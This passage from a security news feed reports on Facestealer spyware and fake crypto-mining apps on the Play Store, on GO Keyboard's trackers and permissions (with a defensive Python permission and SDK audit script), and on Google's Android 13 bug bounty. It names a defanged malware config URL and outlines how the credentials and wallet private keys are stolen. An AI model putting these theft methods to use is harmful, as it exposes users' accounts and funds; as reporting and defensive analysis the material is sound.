One of the main threats identified is Facestealer, a spyware variant capable of stealing Facebook access credentials, allowing subsequent phishing campaigns, social engineering, and invasive advertising. Facestealer is constantly updated and there are multiple versions, making it easy for them to get into the Play Store.

Daily Fitness OL is described as a fitness tool, offering exercise routines and demonstration videos. Although there doesn’t seem to be anything wrong with this app, an in-depth analysis shows that its code hides a Facestealer payload.

When a user opens this app, a request is sent to hxxps://sufen168.space/config to download an encrypted configuration. This configuration prompts the user to log in to Facebook, after which the app launches a WebView to load a malicious URL. A snippet of JavaScript is then injected into the loaded page, allowing the theft of the user’s credentials.

Once the user logs into their Facebook account, the app collects the cookies and the spyware encrypts the collected information to send it to a remote server.

Other malicious apps, such as Enjoy Photo Editor or Panorama Camera, also hide Facestealer payloads and follow a very similar attack process, although some stages or methods may vary.

Risk for crypto investors

Experts have also identified more than 40 fraudulent cryptocurrency apps disguised as legitimate tools, copying their branding or using similar names. The developers of these tools use fake ads to push affected users into buying supposed Premium versions at high prices.

Tools like “Cryptomining Farm Your Own Coin” do not demonstrate invasive behaviors even in test environments, so they effectively evade security mechanisms in the Play Store. However, when trying to connect a Bitcoin wallet to this application, a message appears asking the user to enter their private keys, a clear red flag alerting that something’s wrong.

A sample of the code was developed using Kodular, a free online suite for mobile app development. Trend Micro notes that most fake cryptocurrency apps use the same framework.

The analyzed app only loads a website and does not even have capabilities to simulate mining processes or cryptocurrency transactions.

The loaded website tells users they can take part in a cloud mining project, luring them into the real start of the attack. Next, the threat actors ask users to link a digital wallet to this website in order to collect private keys, which are then transmitted with no encryption at all.

Although the malicious applications were reported to Google and have already been removed from the official store, the researchers believe that the company must considerably improve security measures in the Play Store, as many developers of malicious applications continue to find methods to evade the security of the app repository, putting millions of users at risk.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

GO Keyboard, an app with over 100 million downloads, has full access to the phone and contains tracking code from 20 companies, including Google, Facebook, Amazon and the Russian government https://www.securitynewspaper.com/2022/05/06/go-keyboard-an-app-with-over-100-million-downloads-has-full-access-to-the-phone-and-contains-tracking-code-from-20-companies-including-google-facebook-amazon-and-the-russian-government/ Fri, 06 May 2022 16:39:37 +0000 https://www.securitynewspaper.com/?p=25243

The post GO Keyboard, an app with over 100 million downloads, has full access to the phone and contains tracking code from 20 companies, including Google, Facebook, Amazon and the Russian government appeared first on Information Security Newspaper | Hacking News.

Security researcher Wolfie Christl has detailed how a seemingly harmless custom keyboard mobile app with millions of downloads has almost complete access to the devices where it is installed, in addition to hiding tracking code from 20 companies, including Google, Facebook, Amazon, and other data brokers, some linked to the Russian government.

GO Keyboard – Emojis & Themes is described as a keyboard customization app, with more than 1,000 themes, emojis and fonts for users to add to their devices. Its Google Play Store profile shows more than 100 million downloads and even assures users that their confidential information will never be collected, a claim there is already reason to doubt.

Since the app is still on the Play Store, any Android user might assume that this is a reliable tool. Unfortunately, sometimes unscrupulous developers manage to evade the security mechanisms of the application repository, either by hiding dangerous variants or, as in this case, by requesting highly invasive permissions on the affected systems.

According to Christl, the GO Keyboard code contains a total of 27 trackers, which collect data about characteristics of the smartphone or the user’s activities, mainly for marketing purposes. Among the trackers used by GO Keyboard are Amazon Advertisement, Facebook Ads, Facebook Analytics and Google AdMob.

The app also contains code from myTarget, an advertising platform operated by Mail.Ru Group that is integrated with all the major Russian-speaking social networks.

As if that were not enough, at installation GO Keyboard requests 27 permissions on the system, including access to the device’s precise location, running a foreground service, viewing network connections, full network access, use of the device’s camera, audio recording, reading, modifying and deleting the contents of the SD card, and preventing the device from sleeping. Specialists at Exodus, which detects whether mobile apps contain third-party tracking code, find it worrying that a simple keyboard customization tool requests so many permissions.
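The two checks behind findings like the ones above can be automated. As an added example (not Exodus or GO Keyboard code), the Python below parses an Android manifest for the permissions an app requests, compares them with what an input method plausibly needs, and scans the app’s class list (as produced by apktool or jadx) for known advertising and analytics SDK packages. The manifest and class list are constructed; the keyboard permission baseline and the SDK package prefixes are assumptions drawn from public SDK documentation, not from Christl’s report.

```python
"""Audit requested permissions and bundled ad/analytics SDKs in an Android app.
Added example; manifest, class list, baseline and prefixes are constructed/assumed."""
import xml.etree.ElementTree as ET
from typing import Dict, Iterable, List, Set

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Runtime ("dangerous") permissions that reach personal data or hardware
SENSITIVE_PERMISSIONS: Dict[str, str] = {
    "android.permission.ACCESS_FINE_LOCATION": "precise location",
    "android.permission.CAMERA": "camera",
    "android.permission.RECORD_AUDIO": "microphone",
    "android.permission.READ_EXTERNAL_STORAGE": "read SD card contents",
    "android.permission.WRITE_EXTERNAL_STORAGE": "modify or delete SD card contents",
}

# Assumed baseline of what a keyboard plausibly needs; anything else needs a justification
KEYBOARD_BASELINE: Set[str] = {
    "android.permission.INTERNET",
    "android.permission.VIBRATE",
    "android.permission.READ_USER_DICTIONARY",
}

# Java package prefixes of ad/analytics SDKs (assumed from vendor documentation)
TRACKER_PREFIXES: Dict[str, str] = {
    "com.facebook.ads.": "Facebook Audience Network",
    "com.facebook.appevents.": "Facebook Analytics",
    "com.google.android.gms.ads.": "Google AdMob",
    "com.amazon.device.ads.": "Amazon Mobile Ads",
    "com.my.target.": "myTarget (Mail.Ru Group)",
}

# Constructed manifest for a hypothetical keyboard app
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.keyboard">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.WAKE_LOCK"/>
  <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
  <application android:label="Example Keyboard">
    <service android:name=".LatinIME" android:permission="android.permission.BIND_INPUT_METHOD"/>
  </application>
</manifest>"""

# Constructed class list, as a decompiler would list it
SAMPLE_CLASSES = [
    "com.example.keyboard.LatinIME",
    "com.example.keyboard.ThemeStore",
    "com.google.android.gms.ads.MobileAds",
    "com.facebook.ads.AdView",
    "com.my.target.ads.InterstitialAd",
]


def requested_permissions(manifest_xml: str) -> List[str]:
    """Every <uses-permission android:name=...> in the manifest, in document order."""
    root = ET.fromstring(manifest_xml)
    return [el.get(ANDROID_NS + "name", "") for el in root.iter("uses-permission")]


def audit_permissions(manifest_xml: str) -> Dict[str, List[str]]:
    """Split requested permissions into sensitive ones and ones beyond the keyboard baseline."""
    perms = requested_permissions(manifest_xml)
    return {
        "sensitive": [p for p in perms if p in SENSITIVE_PERMISSIONS],
        "beyond_baseline": [p for p in perms if p not in KEYBOARD_BASELINE],
    }


def detect_trackers(class_names: Iterable[str]) -> Set[str]:
    """Vendors whose SDK package prefix appears in the class list."""
    return {vendor for cls in class_names
            for prefix, vendor in TRACKER_PREFIXES.items() if cls.startswith(prefix)}


if __name__ == "__main__":
    report = audit_permissions(SAMPLE_MANIFEST)
    for perm in report["sensitive"]:
        print(f"sensitive: {perm} ({SENSITIVE_PERMISSIONS[perm]})")
    print("beyond baseline:", ", ".join(report["beyond_baseline"]))
    print("trackers:", ", ".join(sorted(detect_trackers(SAMPLE_CLASSES))))
```

Matching on package prefixes is how Exodus-style scanners work in practice; it misses SDKs whose classes have been renamed by an obfuscator, so a clean tracker result is evidence, not proof. The permission audit, on the other hand, reads the manifest that Android itself enforces, so a keyboard that declares CAMERA or RECORD_AUDIO really can use them once the user grants the runtime prompt.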

These findings have already been shared with Google, although the app is still available on the Play Store and its developers don’t seem to have made any changes. In addition, there are hundreds of applications that maintain similar practices, accumulating millions of downloads and exposing users to all kinds of risks. As usual, the recommendation for Android users is to uninstall this app from their devices.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

You can earn 1.5 million dollar by finding vulnerabilities in Android 13 Beta https://www.securitynewspaper.com/2022/05/02/you-can-earn-1-5-million-dollar-by-finding-vulnerabilities-in-android-13-beta/ Mon, 02 May 2022 21:28:57 +0000 https://www.securitynewspaper.com/?p=25197

The post You can earn 1.5 million dollar by finding vulnerabilities in Android 13 Beta appeared first on Information Security Newspaper | Hacking News.

Google has decided to temporarily increase payments in its vulnerability bounty program for those researchers who submit reports of flaws in Android 13 Beta, in a bid to significantly improve the security of the new iteration of its operating system for mobile devices. Until May 26, researchers who find security flaws in this operating system will be able to receive a bonus of 50% of the original bounty amount.

The maximum bounty for successful reports through Google’s program is $1 million USD, applicable for remote code execution issues on the Titan M chip, used in Pixel devices. Via Twitter, Google detailed: “Vulnerabilities in Android 13 Beta discovered between 04/26/22 and 05/26/22 are eligible for a reward payment of up to $1.5 million USD for a full chain of remote code execution exploits on Titan M.”

On the other hand, reports of data exfiltration flaws in Titan M could be rewarded with up to $750,000 USD during this special period, as opposed to the $500,000 usually paid to researchers.

Finally, code execution flaws in Android components such as the secure element, the trusted execution environment and the kernel could receive up to $375,000 USD. Just a month ago, Google announced that the rewards for eligible vulnerability reports on Google Nest and Fitbit would be doubled, as the tech giant continues to incentivize collaboration with independent security specialists.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
